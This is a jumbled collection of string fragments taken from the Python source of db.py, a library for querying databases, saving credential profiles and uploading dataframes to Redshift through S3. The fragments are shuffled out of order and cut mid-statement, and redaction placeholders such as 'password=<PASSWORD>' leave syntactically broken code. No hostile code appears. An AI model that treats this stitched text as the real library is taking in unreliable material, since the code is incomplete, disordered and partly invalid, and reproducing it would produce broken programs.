self.cur del self.con def load_credentials(self, profile=\"default\"):", "from db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\")", "from ({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql else: if limit:", "credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles():", "return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database", "2 Balls to the Wall 2 2 2 3 Fast As a Shark", "= {} user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile =", "Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur", "connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try:", "import pandas as pd import pybars from .column import Column, ColumnSet from .table", "password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB", "0.99 6 Let's Get It Up 0.99 7 Inject The Venom 0.99 8", "self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in tables: for row in", "5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to sqlite database", "2 Restless and Wild 3 Restless and Wild 4 Restless and Wild 5", "6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8", "port = 1433 elif profile is not None: pass else: raise Exception(\"Database type", "definitions. Most of you probably don't need this, but if you're a db", "= creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"):", "not to include \"system\" tables (the ones that the database needs in order", "u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename':", "self.port = port self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas", "self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'):", "\"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver", "much faster when it comes time to run the \\COPY statment. # #", "col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if", "import Key from boto.s3.connection import Location # if boto is present, set the", "Address | NVARCHAR(70) | | Genre | GenreId | INTEGER | | Invoice", "HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError:", "elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433 elif profile is", "NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+", "Finger On You 1 1 6 7 Let's Get It Up 1 1", "limit=None): \"\"\" Query your database from a file. Parameters ---------- filename: str A", "cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password self.hostname =", "{} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value", "DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns)", "Name | Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | |", "sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull", "from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f =", "= len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)", "Rock We Salute You Name UnitPrice 0 For Those About To Rock (We", "Track | MediaTypeId | INTEGER | | Track | GenreId | INTEGER |", "from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import Location #", "is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur", "t.start() threads.append(t) # join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if", "continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000):", "for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None", "Snowballed 1 1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds \\", "... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503", "None indicates that there will be no limit (That's right, you'll be limitless.", "profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] =", "running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is running on.", "override it by adding limit={X} to the `query` method, or by passing an", "w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables containing trans >>>", "columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+", "uuid import re import os import sys from collections import defaultdict import pandas", "filename: str path to sqlite database dbname: str Name of the database schemas:", "self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively", "9 For Those About To Rock We Salute You Name UnitPrice 0 For", "exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql", "Wild 3 Restless and Wild 4 Restless and Wild 5 For Those About", "data from s3 to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials", "pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\":", "| Customer | Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER", "else: self.username = username self.password = password self.hostname = hostname self.port = port", "sys from collections import defaultdict import pandas as pd import pybars from .column", "# defaults to using SQLite format. need to convert it to Postgres sql", "remove_profile(name, s3=False): \"\"\" Removes a profile from your config \"\"\" user = os.path.expanduser(\"~\")", "3 Fast As a Shark 3 2 3 4 Restless and Wild 3", "Defaults to all. profile: str Preconfigured database credentials / profile for how you", "2 5 6 Put The Finger On You 1 1 6 7 Let's", "in data] query = [str(item) for item in query] if union==True: query =", "used to control the rendering of PrettyTable a bit. None means that you'll", "0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1", "| InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER | |", "INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>>", "to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert =", "handlebars-queries. Data will be passed to the template and rendered using handlebars. union:", ", ... {{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>> data", "= load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus", "NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | | Track | Name", "sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert into", "import query_templates # attempt to import the relevant database libraries # TODO: maybe", "0.99 >>> q = ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice", "'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q =", "Default number of records to return in a query. This is used by", "self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or", "Wall 2 2 3 Restless and Wild 2 3 4 Let There Be", "ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE = True except", "(optional) identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile)", "t in sorted(tables.keys())]) # optimize the foreign/ref key query by doing it one", "Exception as e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def", "some cases. driver: str, None Driver for mssql/pyodbc connections. Examples -------- db =", "query = str(query) else: return q return query def query(self, q, data=None, union=True,", "union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename,", "the \\COPY here. the s3 argument is a prefix, so it'll pick up", "Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols", "False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring", "Exception(\"Couldn't find psycopg2 library. Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password,", "hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if", "speed is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2", "tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if", "5 For Those About To Rock We Salute You 6 For Those About", "in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and column names", "| ArtistId | INTEGER | | Artist | ArtistId | INTEGER | |", "StringIO # Python 3.3+ import uuid import re import os import sys from", "\\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df", "try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety", "limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True,", "we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\" copy {name}", "s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file", "| INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if", "str, None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\")", "to save them in script. Parameters ---------- profile: str (optional) identifier/name for your", "Title \\ 0 For Those About To Rock We Salute You 1 Balls", "in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else:", "<NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2", "and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur:", "| Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns", "the file into pieces. according to amazon, this is # much faster when", "HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL =", "ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL", "q = q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit)", "MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER | | Track", "PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER |", "* from ({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql else: if", "self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table", "Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\")", "for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF", "0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99", "self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str", "if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must", "return in a query. This is used by the DB.query method. You can", "= self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or", "CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine", "column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type)", "the database password: str Your password for the database hostname: str Hostname your", "import glob import gzip try: from StringIO import StringIO # Python 2.7 except:", "5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\":", "if limit: q = q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit", "to the template and rendered using handlebars. union: bool Whether or not \"UNION", "pymysql library. Please ensure it is installed\") creds = {} for arg in", "it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True", "q = fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't", "data_type) in cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates,", "instance of DB that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for", "self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None:", "encoded JSON file. This is not to say this a secure way to", "= False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False", "| INTEGER | | Track | MediaTypeId | INTEGER | | Track |", "It Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil", "| EmployeeId | INTEGER | | Genre | GenreId | INTEGER | |", "self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save", "{{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>> data = {\"cols\":", "but it will probably stop your little sister from stealing your passwords. Parameters", "AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via", "1 4 5 Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data,", "return q # mssql else: if limit: q = \"select top {limit} *", "347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those About To", "About To Rock We Salute You 6 For Those About To Rock We", "2 slices per node, so if running 2 nodes you will want chunk_size=4,", "info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook, dbtype='sqlite',", "column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as", "= s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if", "database password: str Your password for the database hostname: str Hostname your database", "base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or ''", "(sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list):", "SELECT ... {{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}} ...", "List of schemas to include. Defaults to all. profile: str Preconfigured database credentials", "out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return", "\"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() #", "from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info", "\"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] =", "Name | Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER | |", "that the database needs in order to operate). This includes things like schema", "| +---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album | ArtistId", "| Employee | EmployeeId | INTEGER | | Genre | GenreId | INTEGER", "= creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your", "| INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols =", "union=True): if (sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if", "for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k", "cache if dbtype not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if", "Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all", "\"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\"", "the database schemas: list List of schemas to include. Defaults to all. profile:", "from boto.s3.connection import Location # if boto is present, set the bucket_location to", "library. Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname)", "if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or", "(the ones that the database needs in order to operate). This includes things", "rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM", "We Salute You Name UnitPrice 0 For Those About To Rock (We Salute", "t ... on a.AlbumId = t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as", "buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket)", "343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99", "your database with a raw string. Parameters ---------- q: str Query string to", "if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please", "passed to the template and rendered using handlebars. union: bool Whether or not", "This includes things like schema definitions. Most of you probably don't need this,", "... {{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>> data =", "Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | | Track", "your database credentials so you don't have to save them in script. Parameters", "tables (the ones that the database needs in order to operate). This includes", "Employee | EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70) |", "AlbumId | INTEGER | | Track | MediaTypeId | INTEGER | | Track", "Track | MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER |", ")) t.start() threads.append(t) # join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\")", "tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql", "conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to", ">>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r", "a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for", "as table_name, ... COUNT(*) as cnt ... FROM ... {{ name }} ...", "filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username", "table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema", "to your db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f,", "INTEGER | | MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId", "There Be Rock 1 4 5 Big Ones 3 \"\"\" if data: q", "conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as credentials plus tables", "by adding limit={X} to the `query` method, or by passing an argument to", "for handlebars-queries. Data will be passed to the template and rendered using handlebars.", "-= Should sort in some way for all those doctests to be viable...", "foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates,", "i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f:", "representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of", "profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\" Removes", "u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles", "| ArtistId | INTEGER | | Customer | SupportRepId | INTEGER | |", "| INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ |", "exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and looks for any new", "210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497", "doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql:", "\"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name,", "Utility for exploring and querying a database. Parameters ---------- username: str Your username", "+----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ | Customer |", "dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None,", "Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1", ">>> from db import DemoDB >>> db = DemoDB() >>> q = '''", "1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel", "return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\":", "isinstance(data, list): query = [template(item) for item in data] query = [str(item) for", "(\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None,", "3503 >>> q = ''' ... SELECT ... {{#cols}} ... {{#if @last}} ...", "port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\'", "4 5 Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data, union)", "= profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials", "Python 2.7 except: from io import StringIO # Python 3.3+ import uuid import", "| INTEGER | | Invoice | CustomerId | INTEGER | | InvoiceLine |", "query for getting all key relationships # 3. use the naive approach if", "= False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for", "you probably don't need this, but if you're a db admin you might", "| | Genre | GenreId | INTEGER | | Invoice | InvoiceId |", "values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls", "except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db =", "u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype':", "lazily importing boto only if necessary here. if bucket_location is None: bucket_location =", "| | MediaType | Name | NVARCHAR(120) | | Playlist | Name |", "query = [template(item) for item in data] query = [str(item) for item in", "queries as a single data frame. limit: int Number of records to return", "method, or by passing an argument to `DB()`. None indicates that there will", "Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username and self.password)", "given profile. Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON", "s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is", ">>> from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f", "on specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket", "None Default number of records to return in a query. This is used", "sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if", "self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert:", "and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar,", "Snowballed 0.99 9 Evil Walks 0.99 >>> template = ''' ... SELECT ...", "dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB >>> db =", "raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or as an environment variable", "the database needs in order to operate). This includes things like schema definitions.", "self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column", "Query string to execute data: list, dict Optional argument for handlebars-queries. Data will", "data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way", "sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql +", "tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists", "dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None:", "password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\")", "int, None Default number of records to return in a query. This is", "= DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def", "data_type: str, list (optional) specify which data type(s) you want to return Examples", "limit: q = \"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return q", "self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None: raise Exception(\"Database type", ">>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275 2 Track", "varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master", "Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779", "can use an S3 object print_sql: bool (False) option for printing sql statement", "... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a", "For Those About To Rock We Salute You 1 1 2 Balls to", "from io import StringIO # Python 3.3+ import uuid import re import os", "self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache: # table metadata", "col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not", "will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws", "/ profile for how you like your queries exclude_system_tables: bool Whether or not", "creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port", "True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class", "installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\",", "self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port,", "to drop the table if it already exists chunk_size: int (10000) Number of", "redshift sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite format. need to", "| | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId |", "item in query] if union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query)", "\"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\"", "= sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY if it doens't", "list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port':", "INTEGER | | InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId", "1 1 1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer", "find for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name", "'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, 